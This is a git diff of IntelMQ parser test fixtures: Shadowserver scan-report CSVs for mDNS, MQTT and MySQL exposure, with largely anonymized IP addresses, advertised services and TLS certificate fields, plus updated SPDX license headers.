-"2016-07-24 07:38:42","198.51.100.142","udp",5353,"198-51-100-142.example.net","mdns",680,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _adisk.examplehostname.local.; _http.examplehostname.local.; _afpovertcp.examplehostname.local.; _device-info.examplehostname.local.; _smb.examplehostname.local.; _sftp.examplehostname.local.;","examplehostname.local.","198.51.100.85",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:42","198.51.100.173","udp",5353,"198-51-100-180.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.119","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:42","198.51.100.183","udp",5353,"198-51-100-108.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.221 198.51.100.221 198.51.100.221","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:42","198.51.100.156","udp",5353,"198-51-100-156.example.net","mdns",25058,"DE","BAYERN","DETTINGEN AM MAIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.200 198.51.100.200 198.51.100.200 198.51.100.200 198.51.100.200",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:43","198.51.100.162","udp",5353,,"mdns",49435,"DE","NORDRHEIN-WESTFALEN","BONN",0,0,,,,"_workstation.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:43","198.51.100.140","udp",5353,"198-51-100-140.example.net","mdns",31334,"DE","NIEDERSACHSEN","HERZBERG AM HARZ",0,0,,,,"_spotify-connect.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:43","198.51.100.121","udp",5353,"198-51-100-121.example.net","mdns",3209,"DE","BERLIN","BERLIN",0,0,,,,"_spotify-connect.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:43","198.51.100.33","udp",5353,"198-51-100-203.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.16","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:43","198.51.100.166","udp",5353,"198-51-100-166.example.net","mdns",29239,"DE","BADEN-WURTTEMBERG","GOPPINGEN",0,0,,,,"_workstation.examplehostname.local.; _ssh.examplehostname.local.; _sftp-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.135 198.51.100.135 198.51.100.135 198.51.100.135 198.51.100.135 198.51.100.135 198.51.100.135 21",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:44","198.51.100.154","udp",5353,"198-51-100-154.example.net","mdns",3209,"DE","HAMBURG","HAMBURG",0,0,,,,"_workstation.examplehostname.local.; _http.examplehostname.local.; _afpovertcp.examplehostname.local.; _device-info.examplehostname.local.; _smb.examplehostname.local.;","examplehostname.local.","198.51.100.237","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:44","198.51.100.45","udp",5353,"198-51-100-45.example.net","mdns",6724,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:44","198.51.100.140","udp",5353,"198-51-100-140.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.128 198.51.100.128 198.51.100.128 198.51.100.128 198.51.100.128 198.51.100.128 198.51.100.128","2a01:4f8:130:64c1:0:0:0:2 2a01:4f8:130:64c1:0:0:0:3 2a01:4f8:130:64c1:0:0:0:1010","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:44","198.51.100.125","udp",5353,"198-51-100-167.example.net","mdns",35244,"DE","SACHSEN-ANHALT","QUEDLINBURG",0,0,,,,"_http.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:44","198.51.100.73","udp",5353,"198-51-100-73.example.net","mdns",8422,"DE","NORDRHEIN-WESTFALEN","COLOGNE",518210,737415,,,,"_spotify-connect.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:44","198.51.100.63","udp",5353,"198-51-100-63.example.net","mdns",20647,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.253","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:44","198.51.100.29","udp",5353,"198-51-100-29.example.net","mdns",24940,"DE","RHEINLAND-PFALZ","TRIER",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.0 198.51.100.0 198.51.100.0 198.51.100.0 198.51.100.0 198.51.100.0 198.51.100.0","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:44","198.51.100.143","udp",5353,"198-51-100-143.example.net","mdns",680,"DE","BREMEN","BREMEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.10","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:44","198.51.100.206","udp",5353,,"mdns",201229,"DE","HESSEN","FRANKFURT AM MAIN",541512,737999,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.76 198.51.100.76","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:44","198.51.100.199","udp",5353,"198-51-100-199.example.net","mdns",51167,"DE","BAYERN","MUNICH",0,0,,,,"_workstation.examplehostname.local.; _mumble.examplehostname.local.;","examplehostname.local.","198.51.100.138","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:45","198.51.100.30","udp",5353,"198-51-100-30.example.net","mdns",25058,"DE","BADEN-WURTTEMBERG","TUBINGEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.158",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:45","198.51.100.16","udp",5353,"198-51-100-16.example.net","mdns",3320,"DE","BAYERN","AUGSBURG",541690,874899,,,,"_spotify-connect.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:45","198.51.100.61","udp",5353,"198-51-100-61.example.net","mdns",24961,"DE","NORDRHEIN-WESTFALEN","DUSSELDORF",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.108","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:45","198.51.100.56","udp",5353,"198-51-100-56.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.62 198.51.100.62 198.51.100.62 198.51.100.62 198.51.100.62 198.51.100.62 198.51.100.62","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:45","198.51.100.96","udp",5353,"198-51-100-53.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.150","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:46","198.51.100.69","udp",5353,,"mdns",680,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:47","198.51.100.89","udp",5353,"198-51-100-89.example.net","mdns",8972,"DE","NORDRHEIN-WESTFALEN","WEEZE",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:47","198.51.100.17","udp",5353,"198-51-100-17.example.net","mdns",680,"DE","NIEDERSACHSEN","EMDEN",0,0,,,,"_workstation.examplehostname.local.; _http.examplehostname.local.; _smb.examplehostname.local.; _qmobile.examplehostname.local.; _qdiscover.examplehostname.local.; _device-info.examplehostname.local.; _afpovertcp.examplehostname.local.; _adisk.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:47","198.51.100.8","udp",5353,,"mdns",29066,"DE","HESSEN","HANAU",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.94","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:47","198.51.100.244","udp",5353,"198-51-100-244.example.net","mdns",12816,"DE","BAYERN","GARMISCH-PARTENKIRCHEN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.145","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:47","198.51.100.228","udp",5353,,"mdns",201229,"DE","HESSEN","FRANKFURT AM MAIN",541512,737999,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.235","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:48","198.51.100.209","udp",5353,"198-51-100-106.example.net","mdns",31103,"DE","THURINGEN","ERFURT",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.177 198.51.100.177 198.51.100.177 198.51.100.177 198.51.100.177 198.51.100.177 217.","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:48","198.51.100.162","udp",5353,"198-51-100-162.example.net","mdns",8365,"DE","HESSEN","DARMSTADT",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.208","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:48","198.51.100.8","udp",5353,"198-51-100-8.example.net","mdns",36351,"DE","HESSEN","FRANKFURT AM MAIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.86","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:48","198.51.100.250","udp",5353,"198-51-100-250.example.net","mdns",42652,"DE","BAYERN","WOLNZACH",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.139","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:48","198.51.100.224","udp",5353,"198-51-100-224.example.net","mdns",680,"DE","BREMEN","BREMEN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.; _ssh.examplehostname.local.; _sftp-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.144","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:49","198.51.100.70","udp",5353,"198-51-100-70.example.net","mdns",3209,"DE","NORDRHEIN-WESTFALEN","MULHEIM AN DER RUHR",0,0,,,,"_spotify-connect.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:49","198.51.100.189","udp",5353,"198-51-100-119.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.227 198.51.100.227","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:49","198.51.100.194","udp",5353,"198-51-100-194.example.net","mdns",680,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.96",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:50","198.51.100.43","udp",5353,"198-51-100-43.example.net","mdns",5430,"DE","HAMBURG","HAMBURG",0,0,,,,"_workstation.examplehostname.local.; _ssh.examplehostname.local.;","examplehostname.local.","198.51.100.206 198.51.100.206 198.51.100.206 198.51.100.206 198.51.100.206 198.51.100.206 198.51.100.206 195",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:50","198.51.100.92","udp",5353,"198-51-100-92.example.net","mdns",680,"DE","HAMBURG","HAMBURG",0,0,,,,"_workstation.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:50","198.51.100.214","udp",5353,,"mdns",251,"DE","HESSEN","FRANKFURT AM MAIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.247 198.51.100.247 198.51.100.247","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:50","198.51.100.196","udp",5353,,"mdns",31400,"DE","RHEINLAND-PFALZ","FREINSHEIM",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.213 198.51.100.213 198.51.100.213 198.51.100.213 198.51.100.213","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:50","198.51.100.125","udp",5353,"198-51-100-125.example.net","mdns",680,"DE","HESSEN","MARBURG",0,0,,,,"_workstation.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:51","198.51.100.7","udp",5353,"198-51-100-7.example.net","mdns",3320,"DE","BAYERN","REGENSBURG",541690,874899,,,,"_spotify-connect.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:51","198.51.100.161","udp",5353,"198-51-100-161.example.net","mdns",680,"DE","NORDRHEIN-WESTFALEN","DORTMUND",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.145","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:51","198.51.100.191","udp",5353,"198-51-100-191.example.net","mdns",20686,"DE","NIEDERSACHSEN","HANNOVER",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.77 198.51.100.77 198.51.100.77","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:51","198.51.100.206","udp",5353,"198-51-100-206.example.net","mdns",29562,"DE","BADEN-WURTTEMBERG","NUSSLOCH",0,0,,,,"_workstation.examplehostname.local.; _device-info.examplehostname.local.; _http.examplehostname.local.; _smb.examplehostname.local.; _webdav.examplehostname.local.; _webdavs.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:52","198.51.100.77","udp",5353,"198-51-100-77.example.net","mdns",31334,"DE","BAYERN","NUREMBERG",0,0,,,,"_workstation.examplehostname.local.; _http.examplehostname.local.; _afpovertcp.examplehostname.local.; _device-info.examplehostname.local.; _smb.examplehostname.local.;","examplehostname.local.","198.51.100.245","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:52","198.51.100.64","udp",5353,"198-51-100-64.example.net","mdns",680,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:52","198.51.100.127","udp",5353,"198-51-100-127.example.net","mdns",553,"DE","BADEN-WURTTEMBERG","ULM",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.127","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:52","198.51.100.156","udp",5353,"198-51-100-156.example.net","mdns",6724,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:52","198.51.100.156","udp",5353,"198-51-100-156.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.46 198.51.100.46 198.51.100.46 198.51.100.46 198.51.100.46 198.51.100.46 198.51.100.46","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:52","198.51.100.57","udp",5353,"198-51-100-57.example.net","mdns",680,"DE","BAYERN","REGENSBURG",0,0,,,,"_workstation.examplehostname.local.; _http.examplehostname.local.;","examplehostname.local.","198.51.100.9","2001:638:a05:6e:203:d6ff:fe02:44c fd00:0:0:6e:203:d6ff:fe02:44c","[00:00:00:00:00:00]",,,,,,,
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","mdns_name","mdns_ipv4","mdns_ipv6","services","workstation_name","workstation_ipv4","workstation_ipv6","workstation_info","http_name","http_ipv4","http_ipv6","http_ptr","http_info","http_target","http_port","spotify_name","spotify_ipv4","spotify_ipv6","opc_ua_discovery"
+"2010-02-10 00:00:00",192.168.0.1,udp,5353,node01.example.com,mdns,64512,ZZ,Region,City,0,0,,,,"_smb._tcp.local.; _device-info._tcp.local.; _http._tcp.local.; _dacp._tcp.local.;",,192.168.0.1,fd09:4ab5:dae9:b078::1,,,192.168.0.1,fd09:4ab5:dae9:b078::1,,,,,,,,
+"2010-02-10 00:00:01",192.168.0.2,udp,5353,node02.example.com,mdns,64512,ZZ,Region,City,0,0,,,,_home-assistant._tcp.local.;,,192.168.0.2,fd09:4ab5:dae9:b078::2,,,192.168.0.2,fd09:4ab5:dae9:b078::2,,,,,,,,
+"2010-02-10 00:00:02",192.168.0.3,udp,5353,node03.example.com,"mdns,iot",64512,ZZ,Region,City,0,0,,,,"_webdav._tcp.local.; _adisk._tcp.local.; _smb._tcp.local.; _http._tcp.local.; _dacp._tcp.local.; _afpovertcp._tcp.local.; _device-info._tcp.local.;",,192.168.0.3,fd09:4ab5:dae9:b078::3,,snmeijer.local.,192.168.0.3,fd09:4ab5:dae9:b078::3,snmeijer._http._tcp.local.,"\"\"vendor=Synology\"\" \"\"model=DS218+\"\" \"\"serial=17A0PCN482002\"\" \"\"version_major=6\"\" \"\"version_minor=2\"\" \"\"version_build=25556\"\" \"\"admin_port=5000\"\" \"\"secure_admin_port=5001\"\" \"\"mac_address=00:11:32:80:fd:b5\"\"",snmeijer.local.,5000,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv.license
index 942a94035..f512a890e 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv.license
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv.license
@@ -1,2 +1,2 @@
-SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
 SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt.csv
index 7e5c763a3..cfe4f0061 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt.csv
@@ -1,3 +1,2 @@
-"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","anonymous_access","raw_response","hex_code","code"
-"2020-03-14 05:45:48","123.45.67.89","tcp",1883,"some.host.com","mqtt",12345,"AA","REGION","CITY",518210,0,"Y",20020000,00,"Connection Accepted"
-"2020-03-14 05:45:51","123.45.67.90","tcp",1883,"another.host.com","mqtt",12345,"AA","REGION","CITY",454110,0,"N",20020003,03,"Connection Refused, Server unavailable"
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","anonymous_access","raw_response","hex_code","code","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serialNumber"
+"2022-02-07 12:56:53","18.220.0.0","tcp",8883,"18-220-0-0.example.com","mqtt",12345,"US","OHIO","COLUMBUS",454110,,"N",20020005,05,"Connection Refused, not authorized","TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",2048,"*.tracesafe.io","Sectigo RSA Domain Validation Secure Server CA","2020-08-12 00:00:00","2022-11-14 00:00:00","70:84:F1:6D:28:DA:B6:E6:27:60:13:8B:2C:93:52:B6:7B:4B:13:7B","D2:D7:54:52:EB:86:4E:2D:34:4D:FC:CE:CD:CF:39:41:E1:06:5C:8B:B8:54:E6:0C:DF:FD:6E:E3:F1:B5:41:00","17:57:FB:88:9D:BE:A7:F0:29:A5:31:FC:79:DF:F7:8A:1C:D6:4A:DF:1B:4A:DC:BF:05:E7:E8:2F:79:9A:FA:FE:F7:E8:66:22:CB:B9:4C:72:F7:FB:6C:1D:59:8C:54:63:70:05:DE:7F:3C:2F:BA:B8:37:18:CE:29:6F:11:E8:AB","DE:2C:98:30:27:2E:7D:C9:ED:A3:9D:AF:9E:CE:14:CC","085699743A23114C9B6B8DC975A8AF42",2,"sha256WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,"Sectigo Limited",,"GB","Greater Manchester","Salford",,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv
new file mode 100644
index 000000000..e0ab4b929
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","raw_response","hex_code","code","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serialNumber"
+"2022-01-10 00:59:34","47.106.0.0","tcp",8883,,"mqtt,mqtt-anon",37963,"CN","GUANGDONG SHENG","SHENZHEN",518210,,20020000,00,"Connection Accepted","TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",2048,"Server","RootCA","2020-05-08 08:07:05","2030-05-06 08:07:05","70:1A:1E:1F:EC:5F:7E:A9:12:32:B2:C9:8A:C9:EE:91:8E:0B:82:45","85:26:A2:F2:A2:50:CD:96:33:19:A6:2D:12:2E:97:6B:D3:06:3C:11:EA:01:B4:B7:25:2A:B7:4F:0A:8F:45:40","72:50:07:30:9A:6F:CB:FD:E2:80:69:02:65:62:77:16:C3:B4:0C:98:44:4E:D4:2C:AC:6B:AF:F8:9E:AB:51:C2:FA:A8:72:A3:45:DF:81:09:50:08:18:EB:03:34:FC:92:33:A7:12:46:FE:90:20:91:86:C5:4D:89:48:86:4C:CD","AB:A8:E0:2C:EF:AE:BF:9D:DD:FA:70:BA:2F:F2:CA:5C",02,2,"sha256WithRSAEncryption","rsaEncryption","EMQ",,"CN","hangzhou",,,,,,,,,"EMQ",,"CN","hangzhou",,,,,,,,
+"2022-01-10 00:59:34","144.76.0.0","tcp",8883,,"mqtt,mqtt-anon",24940,"DE","SACHSEN-ANHALT","WERNIGERODE",518210,,20020000,00,"Connection Accepted","TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",2048,"example.com","R3","2021-12-06 13:48:04","2022-03-06 13:48:03","20:0E:AC:E7:AF:07:8D:D3:16:7C:63:D1:B9:12:AD:1D:2C:F0:46:86","DD:7A:4C:8A:1D:66:1D:7C:F5:17:04:5B:A0:B4:C4:E0:80:58:44:B4:DB:A7:5E:61:AE:43:9D:85:4C:9E:DC:83","55:B6:3D:56:A4:39:6E:99:B6:AF:72:AF:4D:3C:7C:C5:A8:C5:4F:A1:79:92:D0:46:8A:A2:9B:2A:48:0D:00:68:39:F0:B8:67:B4:E0:88:51:2A:D7:55:46:83:BD:ED:1E:09:6E:DB:3D:21:E2:AA:DB:42:6A:33:45:1A:2A:DB:4C","23:99:39:C6:77:D8:9F:55:90:FC:A5:FB:BA:72:8B:42","06B25BEAD1F43266ABCFCDDE408D3544D04B",2,"sha256WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,"Lets Encrypt",,"US",,,,,,,,,
+"2022-01-10 00:59:34","173.0.0.0","tcp",8883,"example.com","mqtt,mqtt-anon",5555,"US","CALIFORNIA","BURBANK",,,20020000,00,"Connection Accepted","TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",2048,"foo.example.com","ClearView2Dev","2020-08-07 16:51:57","2030-08-05 16:51:57","32:4B:66:98:FA:5B:D2:D1:F2:53:83:21:19:11:5A:A9:BE:85:56:16","AE:0D:65:34:2F:51:F7:32:1E:DF:B1:DA:12:C7:6A:DE:42:B5:4B:FF:80:2C:E5:EF:99:F6:CC:01:4B:C9:77:68","44:C4:B8:19:FA:39:55:51:EC:E4:6D:C4:6D:0F:A5:46:BB:D5:F9:FD:A6:8D:DF:F3:2D:D2:92:6C:0B:D5:D3:25:CB:19:50:9D:A6:A4:D4:D3:2E:53:10:F5:8D:77:F7:90:F8:65:A7:79:AB:14:62:72:01:F3:EA:38:E2:68:C7:25","43:0D:A7:89:9E:76:8D:6E:D5:AD:95:CC:F2:91:87:56","A71541EFAE529B03",0,"sha256WithRSAEncryption","rsaEncryption","Sohonet",,,,"<",,,,,,,,"Sohonet","ClearView2Dev",,,,,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mqtt_anon.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv
new file mode 100644
index 000000000..25fed2166
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mysql.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","version","asn","geo","region","city","naics","sic","sector","mysql_protocol_version","server_version","error_code","error_id","error_message","client_can_handle_expired_passwords","client_compress","client_connect_attrs","client_connect_with_db","client_deprecated_eof","client_found_rows","client_ignore_sigpipe","client_ignore_space","client_interactive","client_local_files","client_long_flag","client_long_password","client_multi_results","client_multi_statements","client_no_schema","client_odbc","client_plugin_auth","client_plugin_auth_len_enc_client_data","client_protocol_41","client_ps_multi_results","client_reserved","client_secure_connection","client_session_track","client_ssl","client_transactions","handshake","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","cert_valid","self_signed","cert_expired","validation_level","browser_trusted","browser_error","raw_cert","raw_cert_chain"
